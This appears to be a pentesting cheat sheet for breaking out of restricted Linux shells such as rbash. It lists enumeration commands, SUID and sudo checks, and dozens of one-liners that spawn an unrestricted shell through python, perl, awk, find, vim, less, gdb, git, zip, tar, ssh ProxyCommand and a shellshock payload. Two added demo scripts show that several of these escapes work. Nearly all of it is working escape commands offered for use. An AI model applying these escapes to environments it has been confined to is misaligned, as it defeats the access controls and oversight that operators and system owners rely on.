Enumerate

Check what commands you can use

cd
ls
id
mkdir
whoami
...

Check for piping and redirection operators

>
>>
<
|

Check for available languages (quote the globs so the shell does not expand them against the current directory)

find / -name 'perl*' 2>/dev/null
find / -name 'python*' 2>/dev/null
find / -name 'ruby*' 2>/dev/null
find / -name 'lua*' 2>/dev/null
find / -name 'php*' 2>/dev/null
find / -name 'go*' 2>/dev/null
...

Check for sudo commands that run without a password

sudo -l

Check for SUID binaries

find / -perm -u=s -type f 2>/dev/null

Check the current shell ($SHELL is the login shell from /etc/passwd, which is not always the shell you are sitting in; rbash will not let you change SHELL or PATH)

echo $SHELL

List environmental variables

env
printenv 
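The checks above, run in one go as an added example (not part of the guide this page draws on): each probe is passed to `bash -r`, bash's restricted mode, so the verdict reflects what rbash itself refuses rather than what the outer shell allows. The probe list and the interpreter names are constructed for the demo, and the script assumes bash is on PATH.

```shell
#!/bin/sh
# Added example: enumerate what a restricted bash (rbash / bash -r) accepts.
# Every probe is run through "bash -r -c", so the restrictions apply to the
# probed command exactly as they would in a victim's rbash.  Assumes bash is
# on PATH; the probe and interpreter lists below are constructed for the demo.

# rprobe CMD -> "allowed" when the restricted shell runs CMD with exit 0,
# "blocked" otherwise (rbash reports the refused action on stderr and fails).
rprobe() {
    if bash -r -c "$1" >/dev/null 2>&1; then
        echo allowed
    else
        echo blocked
    fi
}

# which_interpreters NAME... -> the names that resolve on PATH, a quick
# stand-in for the "find / -name 'perl*'" sweeps when find is not available.
which_interpreters() {
    for name in "$@"; do
        command -v "$name" >/dev/null 2>&1 && echo "$name"
    done
    return 0
}

# One line per item on the cheat sheet: builtins, "/" in command names,
# output and input redirection, pipes, PATH/SHELL assignment, exec, and a
# child shell (a child bash found on PATH is NOT restricted).
enumerate() {
    echo "--- what bash -r accepts ---"
    for cmd in \
        'echo hi' \
        'cd /' \
        '/bin/echo hi' \
        'echo hi > /dev/null' \
        'cat < /dev/null' \
        'echo hi | cat' \
        'PATH=/tmp' \
        'SHELL=/bin/bash' \
        'exec bash' \
        'bash -c true'
    do
        printf '%-22s %s\n' "$cmd" "$(rprobe "$cmd")"
    done
    echo "--- interpreters and escape-capable tools on PATH ---"
    which_interpreters perl python python3 ruby lua php go awk find vim less
}

enumerate
```

Two results are worth noticing: input redirection with `<` is not on rbash's list, so it passes while `>` is refused, and `bash -c true` passes because rbash only restricts itself, not the programs it starts.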

Common Escape Techniques

  • If "/" is allowed in command names you can run /bin/sh or /bin/bash directly.
  • If you can run cp you can copy /bin/sh or /bin/bash into a directory on your PATH and run it by name (PATH is read-only in rbash, so this only helps when the restricted PATH already contains a directory you can write to).
  • From ftp > !/bin/sh or !/bin/bash
  • From gdb > !/bin/sh or !/bin/bash
  • From more/man/less > !/bin/sh or !/bin/bash
  • From vim > :!/bin/sh or :!/bin/bash
  • From rvim > :python import os; os.system("/bin/bash")
  • From scp > scp -S /path/yourscript x y: (the -S program is run in place of ssh)
  • From awk > awk 'BEGIN {system("/bin/sh")}' (or /bin/bash)
  • From find > find / -name test -exec /bin/sh \; (or /bin/bash)

Command Line Escapes

python -c 'import pty; pty.spawn("/bin/sh")'
python -c 'import os; os.system("/bin/bash")'
/bin/sh -i
perl -e 'exec "/bin/sh";'
awk 'BEGIN {system("/bin/sh")}'
find / -name '*.log' -exec /bin/sh \;
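As an added example, not from the original guide, the script below shows why these escapes work: under `bash -r` a redirection is refused, but the same write succeeds when awk or find hands it to a child sh, and a pager-style `!CMD` that goes through a restricted $SHELL only escapes when the command name has no slash. The work directory, marker file and the stand-in rbash wrapper are constructed for the demo; the script assumes bash, awk and find are on PATH, and it writes a file where the real escapes would spawn an interactive shell.

```shell
#!/bin/sh
# Added example: why the awk/find escapes work, and why $SHELL matters.
# bash -r refuses output redirection and command names containing "/", but
# a program it is allowed to run (awk, find, a pager) starts an ordinary
# process, and a child sh/bash started that way is not restricted.
# Assumes bash, awk and find are on PATH.  The work directory, marker file
# and stand-in rbash wrapper are constructed for the demo; the real escapes
# spawn an interactive shell instead of writing a marker file.

workdir=$(mktemp -d)
marker="$workdir/escaped"
trap 'rm -rf "$workdir"' EXIT

# The restricted shell itself will not write the marker ("cannot redirect output").
try_direct() {
    rm -f "$marker"
    if bash -r -c "echo direct > $marker" >/dev/null 2>&1; then
        echo allowed
    else
        echo blocked
    fi
}

# awk is a plain command name, and its system() hands the string to /bin/sh,
# which knows nothing about the restriction.
try_awk() {
    rm -f "$marker"
    bash -r -c "awk 'BEGIN { system(\"echo via-awk > $marker\") }'" >/dev/null 2>&1 || true
    cat "$marker" 2>/dev/null || true
}

# find -exec runs its argument directly; "sh" is looked up on PATH, so the
# command name needs no slash and passes the restricted shell's check.
try_find() {
    rm -f "$marker"
    bash -r -c "find $workdir -maxdepth 0 -exec sh -c 'echo via-find > $marker' \\;" >/dev/null 2>&1 || true
    cat "$marker" 2>/dev/null || true
}

# less, more and vi run "!CMD" as "$SHELL -c CMD".  If the login shell is
# rbash the restriction applies to CMD too; this wrapper, which behaves like
# rbash, stands in for such a login shell.
fake_rbash="$workdir/rbash"
printf '#!/bin/sh\nexec bash -r "$@"\n' > "$fake_rbash"
chmod +x "$fake_rbash"

# pager_bang CMD -> marker content after "!CMD" went through the restricted
# $SHELL (empty when the restricted shell refused CMD).
pager_bang() {
    rm -f "$marker"
    "$fake_rbash" -c "$1" >/dev/null 2>&1 || true
    cat "$marker" 2>/dev/null || true
}

echo "direct redirect under bash -r: $(try_direct)"
echo "via awk system():             $(try_awk)"
echo "via find -exec:               $(try_find)"
echo "!/bin/sh through rbash:       '$(pager_bang "/bin/sh -c 'echo via-slash > $marker'")'"
echo "!sh through rbash:            '$(pager_bang "sh -c 'echo via-path > $marker'")'"
```

The last two lines are the practical lesson for the pager and editor escapes: with SHELL pointing at rbash, `!/bin/sh` is refused because of the slash while `!sh` still works if sh is on the restricted PATH, and vi's `:set shell=/bin/bash` sidesteps the problem entirely because vi then runs that shell itself instead of going through $SHELL.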

Language Interactive Shell Escapes

Perl Shell

exec "/bin/sh";

Ruby Shell

exec "/bin/sh"

Lua Shell

os.execute('/bin/sh')

PHP Shell

system("/bin/sh");

Expect Shell

spawn sh
interact

While Using a Program

IRB

exec "/bin/sh"

Vi

:!bash
# or, when :! is refused because $SHELL is the restricted shell, point vi at another shell first
:set shell=/bin/bash
:shell

Nmap Interactive (nmap --interactive; the mode only exists in nmap 2.02 to 5.21)

!sh

GDB

!/bin/sh

FTP

!/bin/sh

More/Less/Man (the ! escape is run as "$SHELL -c", so check env first: if SHELL is rbash a command name with "/" is refused)

!/bin/sh

Advanced Techniques

  • From ssh > ssh username@IP -t "/bin/sh" or "/bin/bash"
  • From ssh > ssh username@IP -t "bash --noprofile" (skips the profile scripts that often impose the restrictions; with rbash as login shell it only works if bash is reachable on the restricted PATH)
  • From ssh > ssh username@IP -t "() { :; }; /bin/bash" (shellshock, needs an unpatched bash)
  • From ssh > ssh -o ProxyCommand="sh -c /tmp/yourfile.sh" 127.0.0.1 (when ssh is SUID)
  • From git > git help status opens the pager, then !/bin/bash
  • From pico > pico -s "/bin/bash", then type /bin/bash in the buffer and press CTRL + T (runs the "spell checker")
  • From zip > zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"
  • From tar > tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash

Some commands referenced from: 44592-linux-restricted-shell-bypass-guide.pdf